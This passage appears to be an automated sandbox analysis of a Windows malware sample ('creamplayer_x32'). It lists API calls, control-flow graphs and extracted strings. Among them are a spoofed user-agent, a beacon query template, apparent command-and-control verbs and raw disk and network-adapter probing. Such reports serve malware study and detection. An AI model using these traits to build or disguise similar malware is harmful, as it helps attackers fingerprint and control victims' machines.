                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02D45EB5
                                                                                                    • GetTickCount.KERNEL32 ref: 02D45EC9
                                                                                                      • Part of subcall function 02D459FA: _malloc.LIBCMT ref: 02D45A08
                                                                                                    • GetVersionExA.KERNEL32(02D74E18), ref: 02D45EF6
                                                                                                    • _memset.LIBCMT ref: 02D45F15
                                                                                                    • _malloc.LIBCMT ref: 02D45F22
                                                                                                      • Part of subcall function 02D51FAC: __FF_MSGBANNER.LIBCMT ref: 02D51FC3
                                                                                                      • Part of subcall function 02D51FAC: __NMSG_WRITE.LIBCMT ref: 02D51FCA
                                                                                                      • Part of subcall function 02D51FAC: RtlAllocateHeap.NTDLL(00950000,00000000,00000001), ref: 02D51FEF
                                                                                                    • _malloc.LIBCMT ref: 02D45F32
                                                                                                    • _malloc.LIBCMT ref: 02D45F3D
                                                                                                    • _malloc.LIBCMT ref: 02D45F48
                                                                                                    • _malloc.LIBCMT ref: 02D45F53
                                                                                                    • _malloc.LIBCMT ref: 02D45F5E
                                                                                                    • _malloc.LIBCMT ref: 02D45F69
                                                                                                    • _malloc.LIBCMT ref: 02D45F75
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D45F8C
                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D45F95
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FA1
                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FA4
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FAF
                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FB2
                                                                                                    • _memset.LIBCMT ref: 02D45FC2
                                                                                                    • _memset.LIBCMT ref: 02D45FCE
                                                                                                    • _memset.LIBCMT ref: 02D45FDB
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D45FE9
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D45FF6
                                                                                                    • _malloc.LIBCMT ref: 02D46017
                                                                                                    • _malloc.LIBCMT ref: 02D46025
                                                                                                    • _malloc.LIBCMT ref: 02D4602C
                                                                                                    • _malloc.LIBCMT ref: 02D4604D
                                                                                                    • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D46059
                                                                                                    • Sleep.KERNEL32(00000000), ref: 02D46067
                                                                                                    • _malloc.LIBCMT ref: 02D46073
                                                                                                    • _malloc.LIBCMT ref: 02D46083
                                                                                                    • _memset.LIBCMT ref: 02D46098
                                                                                                    • _memset.LIBCMT ref: 02D460A8
                                                                                                    • Sleep.KERNEL32(0000EA60), ref: 02D460F5
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D46100
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D46111
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc$Heap$_memset$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                                    • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                                    • API String ID: 1856495841-1038016512
                                                                                                    • Opcode ID: a42ba558af17723f144ac2691f9521e532a1efcc60d37749874782f63b75a1b2
                                                                                                    • Instruction ID: 8015201e039a7718c96c4b5ba9b060b17b7b67584f2ef11b5b8a5d1c782268f3
                                                                                                    • Opcode Fuzzy Hash: a42ba558af17723f144ac2691f9521e532a1efcc60d37749874782f63b75a1b2
                                                                                                    • Instruction Fuzzy Hash: 4B71B371D483509FD711AF74A809B5B7BE8EF86314F540C19F98897380DBB89C588FA2

                                                                                                    Control-flow Graph
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D4E9B2
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D4E9CB
                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D4E9F0
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 02D4EA79
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                    • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                                    • API String ID: 514930453-3114217049
                                                                                                    • Opcode ID: e862ad87501cf158ef5674ede1413c1e88ea30b1dfa99940960edab970033471
                                                                                                    • Instruction ID: 93c1dcef8812cc20badd8f06703bb39441f5ff238a9d15ad92a4b5c2b5a878cd
                                                                                                    • Opcode Fuzzy Hash: e862ad87501cf158ef5674ede1413c1e88ea30b1dfa99940960edab970033471
                                                                                                    • Instruction Fuzzy Hash: C121D271E08219ABDB10DBA8D8846FEBBB8BF05304F1401AAE545F7341DB30DD49CBA4

                                                                                                    Control-flow Graph
                                                                                                    APIs
                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 02D42BE4
                                                                                                    • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D42C07
                                                                                                      • Part of subcall function 02D494FE: WSAGetLastError.WS2_32(00000000,?,?,02D42A51), ref: 02D4950C
                                                                                                    • WSASetLastError.WS2_32 ref: 02D42CD3
                                                                                                    • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D42CE7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$Recvselect
                                                                                                    • String ID: 3'
                                                                                                    • API String ID: 886190287-280543908
                                                                                                    • Opcode ID: 264b21af09a733239790b2262472bd2f69a1cf37d9c82169d87500ed4e49971d
                                                                                                    • Instruction ID: bace4f564401669b1b30397ae354399f6128fcec657eac27f7d3d29795eb675f
                                                                                                    • Opcode Fuzzy Hash: 264b21af09a733239790b2262472bd2f69a1cf37d9c82169d87500ed4e49971d
                                                                                                    • Instruction Fuzzy Hash: DB4138B1A083018FD7109F64D9187ABBBE9AF85394F10491EF89987790EF74DD40CBA2

                                                                                                    Control-flow Graph
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D4E8B7
                                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D4E8F5
                                                                                                    • GetLastError.KERNEL32 ref: 02D4E956
                                                                                                    • CloseHandle.KERNEL32(?), ref: 02D4E98D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                                    • String ID: \\.\PhysicalDrive0
                                                                                                    • API String ID: 4026078076-1180397377
                                                                                                    • Opcode ID: 07c812abed6d9161501077c764cd7757b802675d9e24c90d3358e503d9b60d6d
                                                                                                    • Instruction ID: e999f918a46913139472a97ce0b5332475d57bf1fc4438f45cc4ce59bb8352f5
                                                                                                    • Opcode Fuzzy Hash: 07c812abed6d9161501077c764cd7757b802675d9e24c90d3358e503d9b60d6d
                                                                                                    • Instruction Fuzzy Hash: 6F315C71D00215FBDB24DF94D888BAEBBB8FF05714F24456AE545A7380DBB05E45CBA0

                                                                                                    Control-flow Graph
                                                                                                    APIs
                                                                                                    • RtlInitializeCriticalSection.NTDLL(02D74FC8), ref: 02D45E83
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D45E9A
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02D45EA3
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D45EB2
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02D45EB5
                                                                                                    • GetTickCount.KERNEL32 ref: 02D45EC9
                                                                                                    • GetVersionExA.KERNEL32(02D74E18), ref: 02D45EF6
                                                                                                    • _memset.LIBCMT ref: 02D45F15
                                                                                                    • _malloc.LIBCMT ref: 02D45F22
                                                                                                    • _malloc.LIBCMT ref: 02D45F32
                                                                                                    • _malloc.LIBCMT ref: 02D45F3D
                                                                                                    • _malloc.LIBCMT ref: 02D45F48
                                                                                                    • _malloc.LIBCMT ref: 02D45F53
                                                                                                    • _malloc.LIBCMT ref: 02D45F5E
                                                                                                    • _malloc.LIBCMT ref: 02D45F69
                                                                                                    • _malloc.LIBCMT ref: 02D45F75
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D45F8C
                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D45F95
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FA1
                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FA4
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FAF
                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FB2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion_memset
                                                                                                    • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                                    • API String ID: 3007647348-1038016512
                                                                                                    • Opcode ID: b81f328acbeb46dcc005e384f011f5c2a2683c7fb82436d9a82aafd793dfd7bb
                                                                                                    • Instruction ID: 5bb5fa7aab3c7dd02311edc45382eb183d9b3e447d6a8716474da662d5fed441
                                                                                                    • Opcode Fuzzy Hash: b81f328acbeb46dcc005e384f011f5c2a2683c7fb82436d9a82aafd793dfd7bb
                                                                                                    • Instruction Fuzzy Hash: 9481C272C483509FD711AF74A848B5B7BE4EF95304F540C1AF98897381EBB89C59CBA2

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 450 2d45e21-2d45e22 451 2d45e24-2d45e2b 450->451 452 2d45e9d-2d45eb5 GetProcAddress GetModuleHandleA GetProcAddress 450->452 453 2d45e2d-2d45e4e 451->453 454 2d45e1f 451->454 455 2d45ebc-2d460dd GetTickCount call 2d459fa GetVersionExA call 2d53750 call 2d51fac * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d53750 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d51fac * 4 QueryPerformanceCounter Sleep call 2d51fac * 2 call 2d53750 * 2 452->455 456 2d45eb7 call 2d442c7 452->456 454->450 499 2d460e1-2d460e3 455->499 456->455 500 2d460e5-2d460ea 499->500 501 2d460ec-2d460ee 499->501 504 2d460f5 Sleep 500->504 502 2d460f0 501->502 503 2d460fb-2d46439 RtlEnterCriticalSection RtlLeaveCriticalSection 501->503 502->504 506 2d46455-2d4645f 503->506 507 2d4643b-2d46441 503->507 504->503 506->499 508 2d46465-2d46489 call 2d53750 call 2d4439c 506->508 509 2d46447-2d46454 call 2d4534d 507->509 510 2d46443-2d46445 507->510 508->499 517 2d4648f-2d464ba RtlEnterCriticalSection RtlLeaveCriticalSection call 2d5133c 508->517 509->506 510->506 520 2d46504-2d4651c call 2d5133c 517->520 521 2d464bc-2d464cb call 2d5133c 517->521 526 2d46522-2d46524 520->526 527 2d467c3-2d467d2 call 2d5133c 520->527 521->520 528 2d464cd-2d464dc call 2d5133c 521->528 526->527 530 2d4652a-2d465d5 call 2d51fac RtlEnterCriticalSection RtlLeaveCriticalSection call 2d53750 * 5 call 2d4439c * 2 526->530 536 2d467d4-2d467d6 527->536 537 2d46817-2d46826 call 2d5133c 527->537 528->520 535 2d464de-2d464ed call 2d5133c 528->535 582 2d465d7-2d465d9 530->582 583 2d46612 530->583 535->520 550 2d464ef-2d464fe call 2d5133c 535->550 536->537 541 2d467d8-2d46812 call 2d53750 RtlEnterCriticalSection RtlLeaveCriticalSection 536->541 548 2d46828-2d46836 call 2d45c02 call 2d45d10 537->548 549 2d4683b-2d4684a call 2d5133c 537->549 541->499 548->499 549->499 562 2d46850-2d46852 549->562 550->499 550->520 562->499 565 2d46858-2d46871 call 2d4439c 562->565 565->499 571 2d46877-2d46946 call 2d51418 call 2d41ba7 565->571 580 2d4694d-2d4696e RtlEnterCriticalSection 571->580 581 2d46948 call 2d4143f 571->581 586 2d46970-2d46977 580->586 587 2d4697a-2d469e1 RtlLeaveCriticalSection call 2d43c67 call 2d43d7e call 2d47330 580->587 581->580 582->583 588 2d465db-2d465ed call 2d5133c 582->588 584 2d46616-2d46644 call 2d51fac call 2d53750 call 2d4439c 583->584 606 2d46685-2d4668e call 2d51f74 584->606 607 2d46646-2d46655 call 2d525e6 584->607 586->587 608 2d469e7-2d46a29 call 2d4971a 587->608 609 2d46b49-2d46b5d call 2d47ff8 587->609 588->583 595 2d465ef-2d46610 call 2d4439c 588->595 595->584 620 2d46694-2d466ac call 2d527b5 606->620 621 2d467b1-2d467be 606->621 607->606 622 2d46657 607->622 618 2d46b13-2d46b44 call 2d473df call 2d433b2 608->618 619 2d46a2f-2d46a36 608->619 609->499 618->609 624 2d46a39-2d46a3e 619->624 634 2d466ae-2d466b6 call 2d4872c 620->634 635 2d466b8 620->635 621->499 626 2d4665c-2d4666e call 2d51850 622->626 624->624 629 2d46a40-2d46a85 call 2d4971a 624->629 637 2d46670 626->637 638 2d46673-2d46683 call 2d525e6 626->638 629->618 643 2d46a8b-2d46a91 629->643 636 2d466ba-2d4675e call 2d49844 call 2d43863 call 2d45119 call 2d43863 call 2d49aea call 2d49c04 634->636 635->636 664 2d46765-2d46790 Sleep call 2d508f0 636->664 665 2d46760 call 2d4380b 636->665 637->638 638->606 638->626 647 2d46a94-2d46a99 643->647 647->647 649 2d46a9b-2d46ad6 call 2d4971a 647->649 649->618 655 2d46ad8-2d46b12 call 2d4c10c 649->655 655->618 669 2d46792-2d4679b call 2d44100 664->669 670 2d4679c-2d467aa 664->670 665->664 669->670 670->621 672 2d467ac call 2d4380b 670->672 672->621
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d, xrefs: 02D46034
                                                                                                    • ntdll.dll, xrefs: 02D45EAA
                                                                                                    • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D4611A
                                                                                                    • strcat, xrefs: 02D45EA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc$Heap$_memset$AllocateProcess$AddressProc$CountHandleModuleTickVersion
                                                                                                    • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$strcat
                                                                                                    • API String ID: 2775057841-1415453879
                                                                                                    • Opcode ID: f5874e376e99e0affbff294687fded759c3fe789043990a2ca0ce732feff095f
                                                                                                    • Instruction ID: 8518acd95e5235935b302e84ff09c5ae4c6ce3aa0ab06da2c93d7632362f77d1
                                                                                                    • Opcode Fuzzy Hash: f5874e376e99e0affbff294687fded759c3fe789043990a2ca0ce732feff095f
                                                                                                    • Instruction Fuzzy Hash: F461A472D483509BD7116F74A808B5B7BE4EF95304F640C1EF58897381DBB88C59CBA6

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 675 2d46411-2d46439 676 2d46455-2d4645f 675->676 677 2d4643b-2d46441 675->677 678 2d46465-2d46489 call 2d53750 call 2d4439c 676->678 679 2d460e1-2d460e3 676->679 680 2d46447-2d46454 call 2d4534d 677->680 681 2d46443-2d46445 677->681 678->679 693 2d4648f-2d464ba RtlEnterCriticalSection RtlLeaveCriticalSection call 2d5133c 678->693 684 2d460e5-2d460ea 679->684 685 2d460ec-2d460ee 679->685 680->676 681->676 690 2d460f5 Sleep 684->690 687 2d460f0 685->687 688 2d460fb-2d4612a RtlEnterCriticalSection RtlLeaveCriticalSection 685->688 687->690 688->675 690->688 696 2d46504-2d4651c call 2d5133c 693->696 697 2d464bc-2d464cb call 2d5133c 693->697 702 2d46522-2d46524 696->702 703 2d467c3-2d467d2 call 2d5133c 696->703 697->696 704 2d464cd-2d464dc call 2d5133c 697->704 702->703 706 2d4652a-2d465d5 call 2d51fac RtlEnterCriticalSection RtlLeaveCriticalSection call 2d53750 * 5 call 2d4439c * 2 702->706 712 2d467d4-2d467d6 703->712 713 2d46817-2d46826 call 2d5133c 703->713 704->696 711 2d464de-2d464ed call 2d5133c 704->711 758 2d465d7-2d465d9 706->758 759 2d46612 706->759 711->696 726 2d464ef-2d464fe call 2d5133c 711->726 712->713 717 2d467d8-2d46812 call 2d53750 RtlEnterCriticalSection RtlLeaveCriticalSection 712->717 724 2d46828-2d46836 call 2d45c02 call 2d45d10 713->724 725 2d4683b-2d4684a call 2d5133c 713->725 717->679 724->679 725->679 738 2d46850-2d46852 725->738 726->679 726->696 738->679 741 2d46858-2d46871 call 2d4439c 738->741 741->679 747 2d46877-2d46946 call 2d51418 call 2d41ba7 741->747 756 2d4694d-2d4696e RtlEnterCriticalSection 747->756 757 2d46948 call 2d4143f 747->757 762 2d46970-2d46977 756->762 763 2d4697a-2d469e1 RtlLeaveCriticalSection call 2d43c67 call 2d43d7e call 2d47330 756->763 757->756 758->759 764 2d465db-2d465ed call 2d5133c 758->764 760 2d46616-2d46644 call 2d51fac call 2d53750 call 2d4439c 759->760 782 2d46685-2d4668e call 2d51f74 760->782 783 2d46646-2d46655 call 2d525e6 760->783 762->763 784 2d469e7-2d46a29 call 2d4971a 763->784 785 2d46b49-2d46b5d call 2d47ff8 763->785 764->759 771 2d465ef-2d46610 call 2d4439c 764->771 771->760 796 2d46694-2d466ac call 2d527b5 782->796 797 2d467b1-2d467be 782->797 783->782 798 2d46657 783->798 794 2d46b13-2d46b44 call 2d473df call 2d433b2 784->794 795 2d46a2f-2d46a36 784->795 785->679 794->785 800 2d46a39-2d46a3e 795->800 810 2d466ae-2d466b6 call 2d4872c 796->810 811 2d466b8 796->811 797->679 802 2d4665c-2d4666e call 2d51850 798->802 800->800 805 2d46a40-2d46a85 call 2d4971a 800->805 813 2d46670 802->813 814 2d46673-2d46683 call 2d525e6 802->814 805->794 819 2d46a8b-2d46a91 805->819 812 2d466ba-2d4675e call 2d49844 call 2d43863 call 2d45119 call 2d43863 call 2d49aea call 2d49c04 810->812 811->812 840 2d46765-2d46790 Sleep call 2d508f0 812->840 841 2d46760 call 2d4380b 812->841 813->814 814->782 814->802 823 2d46a94-2d46a99 819->823 823->823 825 2d46a9b-2d46ad6 call 2d4971a 823->825 825->794 831 2d46ad8-2d46b12 call 2d4c10c 825->831 831->794 845 2d46792-2d4679b call 2d44100 840->845 846 2d4679c-2d467aa 840->846 841->840 845->846 846->797 848 2d467ac call 2d4380b 846->848 848->797
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(0000EA60), ref: 02D460F5
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D46100
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D46111
                                                                                                      • Part of subcall function 02D527B5: _malloc.LIBCMT ref: 02D527CD
                                                                                                    • _memset.LIBCMT ref: 02D46471
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D46494
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D464A5
                                                                                                    • _malloc.LIBCMT ref: 02D4652C
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D4653E
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D4654A
                                                                                                    • _memset.LIBCMT ref: 02D46564
                                                                                                    • _memset.LIBCMT ref: 02D46573
                                                                                                    • _memset.LIBCMT ref: 02D46583
                                                                                                    • _memset.LIBCMT ref: 02D46592
                                                                                                    • _memset.LIBCMT ref: 02D465A1
                                                                                                    • _malloc.LIBCMT ref: 02D4661B
                                                                                                    • _memset.LIBCMT ref: 02D4662C
                                                                                                    • _strtok.LIBCMT ref: 02D4664C
                                                                                                    • _swscanf.LIBCMT ref: 02D46663
                                                                                                    • _strtok.LIBCMT ref: 02D4667A
                                                                                                    • _free.LIBCMT ref: 02D46686
                                                                                                    • Sleep.KERNEL32(000007D0), ref: 02D4676A
                                                                                                    • _memset.LIBCMT ref: 02D467E3
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D467F0
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D46802
                                                                                                      • Part of subcall function 02D4872C: __EH_prolog.LIBCMT ref: 02D48731
                                                                                                      • Part of subcall function 02D4872C: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D487AC
                                                                                                      • Part of subcall function 02D4872C: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D487CA
                                                                                                    • _sprintf.LIBCMT ref: 02D4688C
                                                                                                    • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D46951
                                                                                                    • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D46985
                                                                                                      • Part of subcall function 02D45C02: _malloc.LIBCMT ref: 02D45C10
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$_memset$EnterLeave$_malloc$Sleep_strtok$H_prolog_free_sprintf_swscanf
                                                                                                    • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                                    • API String ID: 3337033272-2823103634
                                                                                                    • Opcode ID: 857c3f2ee627e33f93676bfc724cef6ba4da36df269fc59d577f7f2c058b63b9
                                                                                                    • Instruction ID: 06a5f6805f2d0e978c2d13842820b5a05f95d58d38177993110f9fcfd0aa36c7
                                                                                                    • Opcode Fuzzy Hash: 857c3f2ee627e33f93676bfc724cef6ba4da36df269fc59d577f7f2c058b63b9
                                                                                                    • Instruction Fuzzy Hash: 851205716083819BE7249B24D855BAFB7E9EFC6714F10481EE48A97391EF70DC48CB62

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D41D11
                                                                                                    • GetLastError.KERNEL32 ref: 02D41D23
                                                                                                      • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D41D59
                                                                                                    • GetLastError.KERNEL32 ref: 02D41D6B
                                                                                                    • __beginthreadex.LIBCMT ref: 02D41DB1
                                                                                                    • GetLastError.KERNEL32 ref: 02D41DC6
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D41DDD
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D41DEC
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D41E14
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D41E1B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                                    • String ID: thread$thread.entry_event$thread.exit_event
                                                                                                    • API String ID: 831262434-3017686385
                                                                                                    • Opcode ID: 461d11b6edf76bbb4c3126bec9ad8ad400af27df990a8916b253dc6749b739ca
                                                                                                    • Instruction ID: 928c5f243e2d6b98f4232d4c6eac1994f34ccff0faba0b82155b9ea3ea044029
                                                                                                    • Opcode Fuzzy Hash: 461d11b6edf76bbb4c3126bec9ad8ad400af27df990a8916b253dc6749b739ca
                                                                                                    • Instruction Fuzzy Hash: 4D313975A043119FD700EF24D888B2BBBA5EF84750F104969F9599B390DB70DD89CBE2

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 02D44D8B
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D44DB7
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D44DC3
                                                                                                      • Part of subcall function 02D44BED: __EH_prolog.LIBCMT ref: 02D44BF2
                                                                                                      • Part of subcall function 02D44BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D44CF2
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D44E93
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D44E99
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D44EA0
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D44EA6
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D450A7
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D450AD
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D450B8
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D450C1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                                    • String ID:
                                                                                                    • API String ID: 2062355503-0
                                                                                                    • Opcode ID: 0a52b92b8eca6bc04169b2c5e7b618682797097e5be328b9a7f824430b85b086
                                                                                                    • Instruction ID: 9d020aa834d007dce23436eff9b4da012d8bff4d44c8c6bac66ed3dcaa878653
                                                                                                    • Opcode Fuzzy Hash: 0a52b92b8eca6bc04169b2c5e7b618682797097e5be328b9a7f824430b85b086
                                                                                                    • Instruction Fuzzy Hash: C1B13871D0425E9FEF21DFA0D844BEEBBB5EF14318F24405AE40566280DBB56E89CFA1

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 952 401301-40135e FindResourceA 953 401360-401362 952->953 954 401367-40137d SizeofResource 952->954 957 401538-40153c 953->957 955 401386-4013fe LoadResource LockResource GlobalAlloc call 4023e0 * 2 954->955 956 40137f-401381 954->956 962 401407-40140b 955->962 956->957 963 40140d-40141d 962->963 964 40141f-401428 GetTickCount 962->964 963->962 966 401491-401499 964->966 967 40142a-40142e 964->967 968 4014a2-4014a8 966->968 969 401430-401438 967->969 970 40148f 967->970 971 4014f0-401525 GlobalAlloc call 401000 968->971 972 4014aa-4014e8 968->972 973 401441-401447 969->973 970->971 980 40152a-401535 971->980 974 4014ea 972->974 975 4014ee 972->975 977 401449-401485 973->977 978 40148d 973->978 974->975 975->968 981 401487 977->981 982 40148b 977->982 978->967 980->957 981->982 982->973
                                                                                                    APIs
